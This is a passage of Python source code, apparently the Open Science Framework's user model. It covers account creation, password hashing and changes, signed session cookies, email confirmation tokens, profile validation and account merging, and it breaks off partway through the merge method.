from framework.sessions.model import Session
from framework.sessions.utils import remove_sessions_for_user
from website import mails, settings, filters, security
name_formatters = {
'long': lambda user: user.fullname,
'surname': lambda user: user.family_name if user.family_name else user.fullname,
'initials': lambda user: u'{surname}, {initial}.'.format(
surname=user.family_name,
initial=user.given_name_initial,
),
}
logger = logging.getLogger(__name__)
# Hide implementation of token generation
def generate_confirm_token():
return security.random_string(30)
def generate_claim_token():
return security.random_string(30)
def generate_verification_key():
return security.random_string(30)
def validate_history_item(item):
string_required(item.get('institution'))
startMonth = item.get('startMonth')
startYear = item.get('startYear')
endMonth = item.get('endMonth')
endYear = item.get('endYear')
validate_year(startYear)
validate_year(endYear)
if startYear and endYear:
if endYear < startYear:
raise ValidationValueError('End date must be later than start date.')
elif endYear == startYear:
if endMonth and startMonth and endMonth < startMonth:
raise ValidationValueError('End date must be later than start date.')
def validate_year(item):
if item:
try:
int(item)
except ValueError:
raise ValidationValueError('Please enter a valid year.')
else:
if len(item) != 4:
raise ValidationValueError('Please enter a valid year.')
validate_url = URLValidator()
def validate_profile_websites(profile_websites):
for value in profile_websites or []:
try:
validate_url(value)
except ValidationError:
# Reraise with a better message
raise ValidationError('Invalid personal URL.')
def validate_social(value):
validate_profile_websites(value.get('profileWebsites'))
# TODO - rename to _get_current_user_from_session /HRYBACKI
def _get_current_user():
uid = session._get_current_object() and session.data.get('auth_user_id')
return User.load(uid)
# TODO: This should be a class method of User?
def get_user(email=None, password=None, verification_key=None):
"""Get an instance of User matching the provided params.
:return: The instance of User requested
:rtype: User or None
"""
# tag: database
if password and not email:
raise AssertionError('If a password is provided, an email must also '
'be provided.')
query_list = []
if email:
email = email.strip().lower()
query_list.append(Q('emails', 'eq', email) | Q('username', 'eq', email))
if password:
password = password.strip()
try:
query = query_list[0]
for query_part in query_list[1:]:
query = query & query_part
user = User.find_one(query)
except Exception as err:
logger.error(err)
user = None
if user and not user.check_password(password):
return False
return user
if verification_key:
query_list.append(Q('verification_key', 'eq', verification_key))
try:
query = query_list[0]
for query_part in query_list[1:]:
query = query & query_part
user = User.find_one(query)
return user
except Exception as err:
logger.error(err)
return None
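# Usage sketch (not part of the original module); the email, password and key
# below are placeholders.
#
#     user = get_user(email='alice@example.com')
#     user_or_false = get_user(email='alice@example.com', password='secret')   # False on bad password
#     user = get_user(verification_key=some_key)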
class Auth(object):
def __init__(self, user=None, api_node=None,
private_key=None):
self.user = user
self.api_node = api_node
self.private_key = private_key
def __repr__(self):
return ('<Auth(user="{self.user}", '
'private_key={self.private_key})>').format(self=self)
@property
def logged_in(self):
return self.user is not None
@property
def private_link(self):
if not self.private_key:
return None
try:
# Avoid circular import
from website.project.model import PrivateLink
private_link = PrivateLink.find_one(
Q('key', 'eq', self.private_key)
)
if private_link.is_deleted:
return None
except QueryException:
return None
return private_link
@classmethod
def from_kwargs(cls, request_args, kwargs):
user = request_args.get('user') or kwargs.get('user') or _get_current_user()
private_key = request_args.get('view_only')
return cls(
user=user,
private_key=private_key,
)
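# Usage sketch (not from the original module): Auth is typically constructed
# from the web layer's request arguments plus the view kwargs; `request` and
# `kwargs` here are hypothetical.
#
#     auth = Auth.from_kwargs(request.args.to_dict(), kwargs)
#     if auth.logged_in:
#         ...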
class User(GuidStoredObject, AddonModelMixin):
# Node fields that trigger an update to the search engine on save
SEARCH_UPDATE_FIELDS = {
'fullname',
'given_name',
'middle_names',
'family_name',
'suffix',
'merged_by',
'date_disabled',
'date_confirmed',
'jobs',
'schools',
'social',
}
# TODO: Add SEARCH_UPDATE_NODE_FIELDS, for fields that should trigger a
# search update for all nodes to which the user is a contributor.
SOCIAL_FIELDS = {
'orcid': u'http://orcid.org/{}',
'github': u'http://github.com/{}',
'scholar': u'http://scholar.google.com/citations?user={}',
'twitter': u'http://twitter.com/{}',
'profileWebsites': [],
'linkedIn': u'https://www.linkedin.com/{}',
'impactStory': u'https://impactstory.org/{}',
'researcherId': u'http://researcherid.com/rid/{}',
'researchGate': u'https://researchgate.net/profile/{}',
'academiaInstitution': u'https://{}',
'academiaProfileID': u'.academia.edu/{}',
'baiduScholar': u'http://xueshu.baidu.com/scholarID/{}'
}
# This is a GuidStoredObject, so this will be a GUID.
_id = fields.StringField(primary=True)
# The primary email address for the account.
# This value is unique, but multiple "None" records exist for:
# * unregistered contributors where an email address was not provided.
# TODO: Update mailchimp subscription on username change in user.save()
username = fields.StringField(required=False, unique=True, index=True)
# Hashed. Use `User.set_password` and `User.check_password`
password = fields.StringField()
fullname = fields.StringField(required=True, validate=string_required)
# user has taken action to register the account
is_registered = fields.BooleanField(index=True)
# user has claimed the account
# TODO: This should be retired - it always reflects is_registered.
# While a few entries exist where this is not the case, they appear to be
# the result of a bug, as they were all created over a small time span.
is_claimed = fields.BooleanField(default=False, index=True)
# a list of strings - for internal use
system_tags = fields.StringField(list=True)
# security emails that have been sent
# TODO: This should be removed and/or merged with system_tags
security_messages = fields.DictionaryField()
# Format: {
# <message label>: <datetime>
# ...
# }
# user was invited (as opposed to registered unprompted)
is_invited = fields.BooleanField(default=False, index=True)
# Per-project unclaimed user data:
# TODO: add validation
unclaimed_records = fields.DictionaryField(required=False)
# Format: {
# <project_id>: {
# 'name': <name that referrer provided>,
# 'referrer_id': <user ID of referrer>,
# 'token': <token used for verification urls>,
# 'email': <email the referrer provided or None>,
# 'claimer_email': <email the claimer entered or None>,
# 'last_sent': <timestamp of last email sent to referrer or None>
# }
# ...
# }
# Time of last sent notification email to newly added contributors
# Format : {
# <project_id>: {
# 'last_sent': time.time()
# }
# ...
# }
contributor_added_email_records = fields.DictionaryField(default=dict)
# The user into which this account was merged
merged_by = fields.ForeignField('user', default=None, index=True)
# verification key used for resetting password
verification_key = fields.StringField()
email_last_sent = fields.DateTimeField()
# confirmed emails
# emails should be stripped of whitespace and lower-cased before appending
# TODO: Add validator to ensure an email address only exists once across
# all User's email lists
emails = fields.StringField(list=True)
# email verification tokens
# see also ``unconfirmed_emails``
email_verifications = fields.DictionaryField(default=dict)
# Format: {
# <token> : {'email': <email address>,
# 'expiration': <datetime>}
# }
# TODO remove this field once migration (scripts/migration/migrate_mailing_lists_to_mailchimp_fields.py)
# has been run. This field is deprecated and replaced with mailchimp_mailing_lists
mailing_lists = fields.DictionaryField()
# email lists to which the user has chosen a subscription setting
mailchimp_mailing_lists = fields.DictionaryField()
# Format: {
# 'list1': True,
# 'list2': False,
# ...
# }
# email lists to which the user has chosen a subscription setting, being sent from osf, rather than mailchimp
osf_mailing_lists = fields.DictionaryField(default=lambda: {settings.OSF_HELP_LIST: True})
# Format: {
# 'list1': True,
# 'list2': False,
# ...
# }
# the date this user was registered
# TODO: consider removal - this can be derived from date_registered
date_registered = fields.DateTimeField(auto_now_add=dt.datetime.utcnow,
index=True)
# watched nodes are stored via a list of WatchConfigs
watched = fields.ForeignField('WatchConfig', list=True)
# list of collaborators that this user recently added to nodes as a contributor
recently_added = fields.ForeignField('user', list=True)
# Attached external accounts (OAuth)
external_accounts = fields.ForeignField('externalaccount', list=True)
# CSL names
given_name = fields.StringField()
middle_names = fields.StringField()
family_name = fields.StringField()
suffix = fields.StringField()
# Employment history
jobs = fields.DictionaryField(list=True, validate=validate_history_item)
# Format: {
# 'title': <position or job title>,
# 'institution': <institution or organization>,
# 'department': <department>,
# 'location': <location>,
# 'startMonth': <start month>,
# 'startYear': <start year>,
# 'endMonth': <end month>,
# 'endYear': <end year>,
# 'ongoing': <boolean>
# }
# Educational history
schools = fields.DictionaryField(list=True, validate=validate_history_item)
# Format: {
# 'degree': <position or job title>,
# 'institution': <institution or organization>,
# 'department': <department>,
# 'location': <location>,
# 'startMonth': <start month>,
# 'startYear': <start year>,
# 'endMonth': <end month>,
# 'endYear': <end year>,
# 'ongoing': <boolean>
# }
# Social links
social = fields.DictionaryField(validate=validate_social)
# Format: {
# 'profileWebsites': <list of profile websites>
# 'twitter': <twitter id>,
# }
# hashed password used to authenticate to Piwik
piwik_token = fields.StringField()
# date the user last sent a request
date_last_login = fields.DateTimeField()
# date the user first successfully confirmed an email address
date_confirmed = fields.DateTimeField(index=True)
# When the user was disabled.
date_disabled = fields.DateTimeField(index=True)
# when comments were last viewed
comments_viewed_timestamp = fields.DictionaryField()
# Format: {
# 'Comment.root_target._id': 'timestamp',
# ...
# }
# timezone for user's locale (e.g. 'America/New_York')
timezone = fields.StringField(default='Etc/UTC')
# user language and locale data (e.g. 'en_US')
locale = fields.StringField(default='en_US')
# whether the user has requested to deactivate their account
requested_deactivation = fields.BooleanField(default=False)
# dictionary of projects a user has changed the setting on
notifications_configured = fields.DictionaryField()
# Format: {
# <node.id>: True
# ...
# }
# If this user was created through the API,
# keep track of who added them.
registered_by = fields.ForeignField('user', default=None, index=True)
_meta = {'optimistic': True}
def __repr__(self):
return '<User({0!r}) with id {1!r}>'.format(self.username, self._id)
def __str__(self):
return self.fullname.encode('ascii', 'replace')
__unicode__ = __str__
# For compatibility with Django auth
@property
def pk(self):
return self._id
@property
def email(self):
return self.username
def is_authenticated(self): # Needed for django compat
return True
def is_anonymous(self):
return False
@property
def absolute_api_v2_url(self):
from website import util
return util.api_v2_url('users/{}/'.format(self.pk))
# used by django and DRF
def get_absolute_url(self):
if not self.is_registered:
return None
return self.absolute_api_v2_url
@classmethod
def create_unregistered(cls, fullname, email=None):
"""Create a new unregistered user.
"""
user = cls(
username=email,
fullname=fullname,
is_invited=True,
is_registered=False,
)
user.update_guessed_names()
return user
@classmethod
def create(cls, username, password, fullname):
user = cls(
username=username,
fullname=fullname,
)
user.update_guessed_names()
user.set_password(password)
return user
@classmethod
def create_unconfirmed(cls, username, password, fullname, do_confirm=True,
campaign=None):
"""Create a new user who has begun registration but needs to verify
their primary email address (username).
"""
user = cls.create(username, password, fullname)
user.add_unconfirmed_email(username)
user.is_registered = False
if campaign:
# needed to prevent circular import
from framework.auth.campaigns import system_tag_for_campaign # skipci
user.system_tags.append(system_tag_for_campaign(campaign))
return user
@classmethod
def create_confirmed(cls, username, password, fullname):
user = cls.create(username, password, fullname)
user.is_registered = True
user.is_claimed = True
user.date_confirmed = user.date_registered
user.emails.append(username)
return user
@classmethod
def from_cookie(cls, cookie, secret=None):
"""Attempt to load a user from their signed cookie
:returns: None if a user cannot be loaded else User
"""
if not cookie:
return None
secret = secret or settings.SECRET_KEY
try:
token = itsdangerous.Signer(secret).unsign(cookie)
except itsdangerous.BadSignature:
return None
user_session = Session.load(token)
if user_session is None:
return None
return cls.load(user_session.data.get('auth_user_id'))
def get_or_create_cookie(self, secret=None):
"""Find the cookie for the given user
Create a new session if no cookie is found
:param str secret: The key to sign the cookie with
:returns: The signed cookie
"""
secret = secret or settings.SECRET_KEY
sessions = Session.find(
Q('data.auth_user_id', 'eq', self._id)
).sort(
'-date_modified'
).limit(1)
if sessions.count() > 0:
user_session = sessions[0]
else:
user_session = Session(data={
'auth_user_id': self._id,
'auth_user_username': self.username,
'auth_user_fullname': self.fullname,
})
user_session.save()
signer = itsdangerous.Signer(secret)
return signer.sign(user_session._id)
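# Round-trip sketch (not from the original code): a cookie minted by
# get_or_create_cookie() can be resolved back to the user with from_cookie().
#
#     cookie = user.get_or_create_cookie()
#     assert User.from_cookie(cookie)._id == user._id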
def update_guessed_names(self):
"""Updates the CSL name fields inferred from the the full name.
"""
parsed = utils.impute_names(self.fullname)
self.given_name = parsed['given']
self.middle_names = parsed['middle']
self.family_name = parsed['family']
self.suffix = parsed['suffix']
def register(self, username, password=None):
"""Registers the user.
"""
self.username = username
if password:
self.set_password(password)
if username not in self.emails:
self.emails.append(username)
self.is_registered = True
self.is_claimed = True
self.date_confirmed = dt.datetime.utcnow()
self.update_search()
self.update_search_nodes()
# Emit signal that a user has confirmed
signals.user_confirmed.send(self)
return self
def add_unclaimed_record(self, node, referrer, given_name, email=None):
"""Add a new project entry in the unclaimed records dictionary.
:param Node node: Node this unclaimed user was added to.
:param User referrer: User who referred this user.
:param str given_name: The full name that the referrer gave for this user.
:param str email: The given email address.
:returns: The added record
"""
if not node.can_edit(user=referrer):
raise PermissionsError('Referrer does not have permission to add a contributor '
'to project {0}'.format(node._primary_key))
project_id = node._primary_key
referrer_id = referrer._primary_key
if email:
clean_email = email.lower().strip()
else:
clean_email = None
record = {
'name': given_name,
'referrer_id': referrer_id,
'token': generate_confirm_token(),
'email': clean_email
}
self.unclaimed_records[project_id] = record
return record
def display_full_name(self, node=None):
"""Return the full name , as it would display in a contributor list for a
given node.
NOTE: Unclaimed users may have a different name for different nodes.
"""
if node:
unclaimed_data = self.unclaimed_records.get(node._primary_key, None)
if unclaimed_data:
return unclaimed_data['name']
return self.fullname
@property
def is_active(self):
"""Returns True if the user is active. The user must have activated
their account, must not be deleted, suspended, etc.
:return: bool
"""
return (self.is_registered and
self.password is not None and
not self.is_merged and
not self.is_disabled and
self.is_confirmed)
def get_unclaimed_record(self, project_id):
"""Get an unclaimed record for a given project_id.
:raises: ValueError if there is no record for the given project.
"""
try:
return self.unclaimed_records[project_id]
except KeyError: # reraise as ValueError
raise ValueError('No unclaimed record for user {self._id} on node {project_id}'
.format(**locals()))
def get_claim_url(self, project_id, external=False):
"""Return the URL that an unclaimed user should use to claim their
account. Return ``None`` if there is no unclaimed_record for the given
project ID.
:param project_id: The project ID for the unclaimed record
:raises: ValueError if a record doesn't exist for the given project ID
:rtype: dict
:returns: The unclaimed record for the project
"""
uid = self._primary_key
base_url = settings.DOMAIN if external else '/'
unclaimed_record = self.get_unclaimed_record(project_id)
token = unclaimed_record['token']
return '{base_url}user/{uid}/{project_id}/claim/?token={token}'\
.format(**locals())
def set_password(self, raw_password, notify=True):
"""Set the password for this user to the hash of ``raw_password``.
If this is a new user, we're done. If this is a password change,
then email the user about the change and clear all the old sessions
so that users will have to log in again with the new password.
:param raw_password: the plaintext value of the new password
:param notify: Only meant for unit tests to keep extra notifications from being sent
:rtype: list
:returns: Changed fields from the user save
"""
had_existing_password = bool(self.password)
self.password = generate_password_hash(raw_password)
if self.username == raw_password:
raise ChangePasswordError(['Password cannot be the same as your email address'])
if had_existing_password and notify:
mails.send_mail(
to_addr=self.username,
mail=mails.PASSWORD_RESET,
mimetype='plain',
user=self
)
remove_sessions_for_user(self)
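# Behaviour sketch (not from the original code): setting a password on an
# account that never had one sends no mail, while changing an existing
# password emails the user and clears that user's sessions.
#
#     brand_new_user.set_password('correct horse battery staple')   # no notification
#     existing_user.set_password('correct horse battery staple')    # PASSWORD_RESET mail + sessions cleared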
def check_password(self, raw_password):
"""Return a boolean of whether ``raw_password`` was correct."""
if not self.password or not raw_password:
return False
return check_password_hash(self.password, raw_password)
@property
def csl_given_name(self):
parts = [self.given_name]
if self.middle_names:
parts.extend(each[0] for each in re.split(r'\s+', self.middle_names))
return ' '.join(parts)
@property
def csl_name(self):
return {
'family': self.family_name,
'given': self.csl_given_name,
}
@property
def created(self):
from website.project.model import Node
return Node.find(Q('creator', 'eq', self._id))
# TODO: This should not be on the User object.
def change_password(self, raw_old_password, raw_new_password, raw_confirm_password):
"""Change the password for this user to the hash of ``raw_new_password``."""
raw_old_password = (raw_old_password or '').strip()
raw_new_password = (raw_new_password or '').strip()
raw_confirm_password = (raw_confirm_password or '').strip()
# TODO: Move validation to set_password
issues = []
if not self.check_password(raw_old_password):
issues.append('Old password is invalid')
elif raw_old_password == raw_new_password:
issues.append('Password cannot be the same')
elif raw_new_password == self.username:
issues.append('Password cannot be the same as your email address')
if not raw_old_password or not raw_new_password or not raw_confirm_password:
issues.append('Passwords cannot be blank')
elif len(raw_new_password) < 6:
issues.append('Password should be at least six characters')
elif len(raw_new_password) > 256:
issues.append('Password should not be longer than 256 characters')
if raw_new_password != raw_confirm_password:
issues.append('Password does not match the confirmation')
if issues:
raise ChangePasswordError(issues)
self.set_password(raw_new_password)
def _set_email_token_expiration(self, token, expiration=None):
"""Set the expiration date for given email token.
:param str token: The email token to set the expiration for.
:param datetime expiration: Datetime at which to expire the token. If ``None``, the
token will expire after ``settings.EMAIL_TOKEN_EXPIRATION`` hours. This is only
used for testing purposes.
"""
expiration = expiration or (dt.datetime.utcnow() + dt.timedelta(hours=settings.EMAIL_TOKEN_EXPIRATION))
self.email_verifications[token]['expiration'] = expiration
return expiration
def add_unconfirmed_email(self, email, expiration=None):
"""Add an email verification token for a given email."""
# TODO: This is technically not compliant with RFC 822, which requires
# that case be preserved in the "local-part" of an address. From
# a practical standpoint, the vast majority of email servers do
# not preserve case.
# ref: https://tools.ietf.org/html/rfc822#section-6
email = email.lower().strip()
if email in self.emails:
raise ValueError('Email already confirmed to this user.')
utils.validate_email(email)
# If the unconfirmed email is already present, refresh the token
if email in self.unconfirmed_emails:
self.remove_unconfirmed_email(email)
token = generate_confirm_token()
# handle when email_verifications is None
if not self.email_verifications:
self.email_verifications = {}
# confirmed used to check if link has been clicked
self.email_verifications[token] = {'email': email,
'confirmed': False}
self._set_email_token_expiration(token, expiration=expiration)
return token
def remove_unconfirmed_email(self, email):
"""Remove an unconfirmed email addresses and their tokens."""
for token, value in self.email_verifications.iteritems():
if value.get('email') == email:
del self.email_verifications[token]
return True
return False
def remove_email(self, email):
"""Remove a confirmed email"""
if email == self.username:
raise PermissionsError("Can't remove primary email")
if email in self.emails:
self.emails.remove(email)
signals.user_email_removed.send(self, email=email)
@signals.user_email_removed.connect
def _send_email_removal_confirmations(self, email):
mails.send_mail(to_addr=self.username,
mail=mails.REMOVED_EMAIL,
user=self,
removed_email=email,
security_addr='alternate email address ({})'.format(email))
mails.send_mail(to_addr=email,
mail=mails.REMOVED_EMAIL,
user=self,
removed_email=email,
security_addr='primary email address ({})'.format(self.username))
def get_confirmation_token(self, email, force=False):
"""Return the confirmation token for a given email.
:param str email: Email to get the token for.
:param bool force: If an expired token exists for the given email, generate a new
token and return that token.
:raises: ExpiredTokenError if trying to access a token that is expired and force=False.
:raises: KeyError if there no token for the email.
"""
# TODO: Refactor "force" flag into User.get_or_add_confirmation_token
for token, info in self.email_verifications.items():
if info['email'].lower() == email.lower():
# Old records will not have an expiration key. If it's missing,
# assume the token is expired
expiration = info.get('expiration')
if not expiration or (expiration and expiration < dt.datetime.utcnow()):
if not force:
raise ExpiredTokenError('Token for email "{0}" is expired'.format(email))
else:
new_token = self.add_unconfirmed_email(email)
self.save()
return new_token
return token
raise KeyError('No confirmation token for email "{0}"'.format(email))
def get_confirmation_url(self, email, external=True, force=False):
"""Return the confirmation url for a given email.
:raises: ExpiredTokenError if trying to access a token that is expired.
:raises: KeyError if there is no token for the email.
"""
base = settings.DOMAIN if external else '/'
token = self.get_confirmation_token(email, force=force)
return '{0}confirm/{1}/{2}/'.format(base, self._primary_key, token)
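# Shape of the resulting link (sketch): '<DOMAIN>confirm/<user_id>/<token>/'
# when external=True, or '/confirm/<user_id>/<token>/' when external=False.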
def get_unconfirmed_email_for_token(self, token):
"""Return email if valid.
:rtype: bool
:raises: ExpiredTokenError if trying to access a token that is expired.
:raises: InvalidTokenError if trying to access a token that is invalid.
"""
if token not in self.email_verifications:
raise InvalidTokenError
verification = self.email_verifications[token]
# Not all tokens are guaranteed to have expiration dates
if (
'expiration' in verification and
verification['expiration'] < dt.datetime.utcnow()
):
raise ExpiredTokenError
return verification['email']
def clean_email_verifications(self, given_token=None):
email_verifications = deepcopy(self.email_verifications or {})
for token in self.email_verifications or {}:
try:
self.get_unconfirmed_email_for_token(token)
except (KeyError, ExpiredTokenError):
email_verifications.pop(token)
continue
if token == given_token:
email_verifications.pop(token)
self.email_verifications = email_verifications
def verify_claim_token(self, token, project_id):
"""Return whether or not a claim token is valid for this user for
a given node which they were added as a unregistered contributor for.
"""
try:
record = self.get_unclaimed_record(project_id)
except ValueError: # No unclaimed record for given pid
return False
return record['token'] == token
def confirm_email(self, token, merge=False):
"""Confirm the email address associated with the token"""
email = self.get_unconfirmed_email_for_token(token)
# If this email is confirmed on another account, abort
try:
user_to_merge = User.find_one(Q('emails', 'iexact', email))
except NoResultsFound:
user_to_merge = None
if user_to_merge and merge:
self.merge_user(user_to_merge)
elif user_to_merge:
raise MergeConfirmedRequiredError(
'Merge requires confirmation',
user=self,
user_to_merge=user_to_merge,
)
# If another user has this email as its username, get it
try:
unregistered_user = User.find_one(Q('username', 'eq', email) &
Q('_id', 'ne', self._id))
except NoResultsFound:
unregistered_user = None
if unregistered_user:
self.merge_user(unregistered_user)
self.save()
unregistered_user.username = None
if email not in self.emails:
self.emails.append(email)
# Complete registration if primary email
if email.lower() == self.username.lower():
self.register(self.username)
self.date_confirmed = dt.datetime.utcnow()
# Revoke token
del self.email_verifications[token]
# TODO: We can't assume that all unclaimed records are now claimed.
# Clear unclaimed records, so user's name shows up correctly on
# all projects
self.unclaimed_records = {}
self.save()
self.update_search_nodes()
return True
@property
def unconfirmed_emails(self):
# Handle when email_verifications field is None
email_verifications = self.email_verifications or {}
return [
each['email']
for each
in email_verifications.values()
]
def update_search_nodes(self):
"""Call `update_search` on all nodes on which the user is a
contributor. Needed to add self to contributor lists in search upon
registration or claiming.
"""
for node in self.contributed:
node.update_search()
def update_search_nodes_contributors(self):
"""
Bulk update contributor name on all nodes on which the user is
a contributor.
:return:
"""
from website.search import search
search.update_contributors(self.visible_contributor_to)
def update_affiliated_institutions_by_email_domain(self):
"""
Append affiliated_institutions by email domain.
:return:
"""
# Avoid circular import
from website.project.model import Institution
try:
email_domains = [email.split('@')[1] for email in self.emails]
insts = Institution.find(Q('email_domains', 'in', email_domains))
for inst in insts:
if inst not in self.affiliated_institutions:
self.affiliated_institutions.append(inst)
except (IndexError, NoResultsFound):
pass
@property
def is_confirmed(self):
return bool(self.date_confirmed)
@property
def social_links(self):
social_user_fields = {}
for key, val in self.social.items():
if val and key in self.SOCIAL_FIELDS:
if not isinstance(val, basestring):
social_user_fields[key] = val
else:
social_user_fields[key] = self.SOCIAL_FIELDS[key].format(val)
return social_user_fields
@property
def biblio_name(self):
given_names = self.given_name + ' ' + self.middle_names
surname = self.family_name
if surname != given_names:
initials = [
name[0].upper() + '.'
for name in given_names.split(' ')
if name and re.search(r'\w', name[0], re.I)
]
return u'{0}, {1}'.format(surname, ' '.join(initials))
return surname
@property
def given_name_initial(self):
"""
The user's preferred initialization of their given name.
Some users with common names may choose to distinguish themselves from
their colleagues in this way. For instance, there could be two
well-known researchers in a single field named "Robert Walker".
"Walker, R" could then refer to either of them. "Walker, R.H." could
provide easy disambiguation.
NOTE: The internal representation for this should never end with a
period. "R" and "R.H" would be correct in the prior case, but
"R.H." would not.
"""
return self.given_name[0]
@property
def url(self):
return '/{}/'.format(self._primary_key)
@property
def api_url(self):
return '/api/v1/profile/{0}/'.format(self._primary_key)
@property
def absolute_url(self):
return urlparse.urljoin(settings.DOMAIN, self.url)
@property
def display_absolute_url(self):
url = self.absolute_url
if url is not None:
return re.sub(r'https?:', '', url).strip('/')
@property
def deep_url(self):
return '/profile/{}/'.format(self._primary_key)
@property
def unconfirmed_email_info(self):
"""Return a list of dictionaries containing information about each of this
user's unconfirmed emails.
"""
unconfirmed_emails = []
email_verifications = self.email_verifications or []
for token in email_verifications:
if self.email_verifications[token].get('confirmed', False):
try:
user_merge = User.find_one(Q('emails', 'eq', self.email_verifications[token]['email'].lower()))
except NoResultsFound:
user_merge = False
unconfirmed_emails.append({'address': self.email_verifications[token]['email'],
'token': token,
'confirmed': self.email_verifications[token]['confirmed'],
'user_merge': user_merge.email if user_merge else False})
return unconfirmed_emails
def profile_image_url(self, size=None):
"""A generalized method for getting a user's profile picture urls.
We may choose to use some service other than gravatar in the future,
and should not commit ourselves to using a specific service (mostly
an API concern).
As long as we use gravatar, this is just a proxy to User.gravatar_url
"""
return self._gravatar_url(size)
def _gravatar_url(self, size):
return filters.gravatar(
self,
use_ssl=True,
size=size
)
def get_activity_points(self, db=None):
db = db or framework.mongo.database
return analytics.get_total_activity_count(self._primary_key, db=db)
def disable_account(self):
"""
Disable the user account (set ``is_disabled`` to True) and unsubscribe the
user from mailchimp emails.
"""
from website import mailchimp_utils
try:
mailchimp_utils.unsubscribe_mailchimp(
list_name=settings.MAILCHIMP_GENERAL_LIST,
user_id=self._id,
username=self.username
)
except mailchimp_utils.mailchimp.ListNotSubscribedError:
pass
except mailchimp_utils.mailchimp.InvalidApiKeyError:
if not settings.ENABLE_EMAIL_SUBSCRIPTIONS:
pass
else:
raise
self.is_disabled = True
@property
def is_disabled(self):
"""Whether or not this account has been disabled.
Abstracts ``User.date_disabled``.
:return: bool
"""
return self.date_disabled is not None
@is_disabled.setter
def is_disabled(self, val):
"""Set whether or not this account has been disabled."""
if val and not self.date_disabled:
self.date_disabled = dt.datetime.utcnow()
elif val is False:
self.date_disabled = None
@property
def is_merged(self):
'''Whether or not this account has been merged into another account.
'''
return self.merged_by is not None
@property
def profile_url(self):
return '/{}/'.format(self._id)
@property
def contributed(self):
from website.project.model import Node
return Node.find(Q('contributors', 'eq', self._id))
@property
def contributor_to(self):
from website.project.model import Node
return Node.find(
Q('contributors', 'eq', self._id) &
Q('is_deleted', 'ne', True) &
Q('is_collection', 'ne', True)
)
@property
def visible_contributor_to(self):
from website.project.model import Node
return Node.find(
Q('contributors', 'eq', self._id) &
Q('is_deleted', 'ne', True) &
Q('is_collection', 'ne', True) &
Q('visible_contributor_ids', 'eq', self._id)
)
def get_summary(self, formatter='long'):
return {
'user_fullname': self.fullname,
'user_profile_url': self.profile_url,
'user_display_name': name_formatters[formatter](self),
'user_is_claimed': self.is_claimed
}
def save(self, *args, **kwargs):
# TODO: Update mailchimp subscription on username change
# Avoid circular import
from framework.analytics import tasks as piwik_tasks
self.username = self.username.lower().strip() if self.username else None
ret = super(User, self).save(*args, **kwargs)
if self.SEARCH_UPDATE_FIELDS.intersection(ret) and self.is_confirmed:
self.update_search()
self.update_search_nodes_contributors()
if settings.PIWIK_HOST and not self.piwik_token:
piwik_tasks.update_user(self._id)
return ret
def update_search(self):
from website import search
try:
search.search.update_user(self)
except search.exceptions.SearchUnavailableError as e:
logger.exception(e)
log_exception()
@classmethod
def find_by_email(cls, email):
try:
user = cls.find_one(
Q('emails', 'eq', email)
)
return [user]
except:
return []
def serialize(self, anonymous=False):
return {
'id': utils.privacy_info_handle(self._primary_key, anonymous),
'fullname': utils.privacy_info_handle(self.fullname, anonymous, name=True),
'registered': self.is_registered,
'url': utils.privacy_info_handle(self.url, anonymous),
'api_url': utils.privacy_info_handle(self.api_url, anonymous),
}
###### OSF-Specific methods ######
def watch(self, watch_config):
"""Watch a node by adding its WatchConfig to this user's ``watched``
list. Raises ``ValueError`` if the node is already watched.
:param watch_config: The WatchConfig to add.
"""
watched_nodes = [each.node for each in self.watched]
if watch_config.node in watched_nodes:
raise ValueError('Node is already being watched.')
watch_config.save()
self.watched.append(watch_config)
return None
def unwatch(self, watch_config):
"""Unwatch a node by removing its WatchConfig from this user's ``watched``
list. Raises ``ValueError`` if the node is not already being watched.
:param watch_config: The WatchConfig to remove.
"""
for each in self.watched:
if watch_config.node._id == each.node._id:
from framework.transactions.context import TokuTransaction # Avoid circular import
with TokuTransaction():
# Ensure that both sides of the relationship are removed
each.__class__.remove_one(each)
self.watched.remove(each)
self.save()
return None
raise ValueError('Node not being watched.')
def is_watching(self, node):
'''Return whether or not a user is watching a Node.'''
watched_node_ids = set([config.node._id for config in self.watched])
return node._id in watched_node_ids
def get_recent_log_ids(self, since=None):
'''Return a generator of recent logs' ids.
:param since: A datetime specifying the oldest time to retrieve logs
from. If ``None``, defaults to 60 days before today. Must be a tz-aware
datetime because PyMongo's generation times are tz-aware.
:rtype: generator of log ids (strings)
'''
log_ids = []
# Default since to 60 days before today if since is None
# timezone aware utcnow
utcnow = dt.datetime.utcnow().replace(tzinfo=pytz.utc)
since_date = since or (utcnow - dt.timedelta(days=60))
for config in self.watched:
# Extract the timestamps for each log from the log_id (fast!)
# The first 4 bytes of Mongo's ObjectId encodes time
# This prevents having to load each Log Object and access their
# date fields
node_log_ids = [log.pk for log in config.node.logs
if bson.ObjectId(log.pk).generation_time > since_date and
log.pk not in log_ids]
# Log ids in reverse chronological order
log_ids = _merge_into_reversed(log_ids, node_log_ids)
return (l_id for l_id in log_ids)
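# Sketch of the ObjectId timestamp trick used above (no new behaviour): the
# creation time of a log can be read from its id without loading the Log.
#
#     import bson
#     created = bson.ObjectId(log_pk).generation_time   # tz-aware datetime (UTC)
#     is_recent = created > since_date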
def get_daily_digest_log_ids(self):
'''Return a generator of log ids generated in the past day
(starting at UTC 00:00).
'''
utcnow = dt.datetime.utcnow()
midnight = dt.datetime(
utcnow.year, utcnow.month, utcnow.day,
0, 0, 0, tzinfo=pytz.utc
)
return self.get_recent_log_ids(since=midnight)
@property
def can_be_merged(self):
"""The ability of the `merge_user` method to fully merge the user"""
return all((addon.can_be_merged for addon in self.get_addons()))
def merge_user(self, user):
"""Merge a registered user into this account. This user will be
a contributor on any project. if the registered user and this account
are both contributors of the same project. Then it will remove the
registered user and set this account to the highest permission of the two
and set this account to be visible if either of the two are visible on
the project.
:param user: A User object to be merged.
"""
# Fail if the other user has conflicts.
if not user.can_be_merged:
raise MergeConflictError('Users cannot be merged')
# Move over the other user's attributes
# TODO: confirm
for system_tag in user.system_tags:
if system_tag not in self.system_tags:
self.system_tags.append(system_tag)
self.is_claimed = self.is_claimed or user.is_claimed
self.is_invited = self.is_invited or user.is_invited
# copy over profile only if this user has no profile info
if user.jobs and not self.jobs:
self.jobs = user.jobs
if user.schools and not self.schools:
self.schools = user.schools
if user.social and not self.social:
self.social = user.social
unclaimed = user.unclaimed_records.copy()
unclaimed.update(self.unclaimed_records)
self.unclaimed_records = unclaimed
# - unclaimed records should be connected to only one user
user.unclaimed_records = {}
security_messages = user.security_messages.copy()
security_messages.update(self.security_messages)
self.security_messages = security_messages
notifications_configured = user.notifications_configured.copy()
